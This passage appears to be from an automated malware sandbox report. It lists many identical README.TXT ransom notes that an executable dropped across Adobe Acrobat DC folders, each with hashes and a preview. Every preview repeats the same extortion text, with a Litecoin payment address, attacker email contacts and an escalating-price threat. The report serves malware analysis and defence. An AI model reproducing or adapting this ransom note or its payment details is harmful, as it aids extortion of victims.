                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
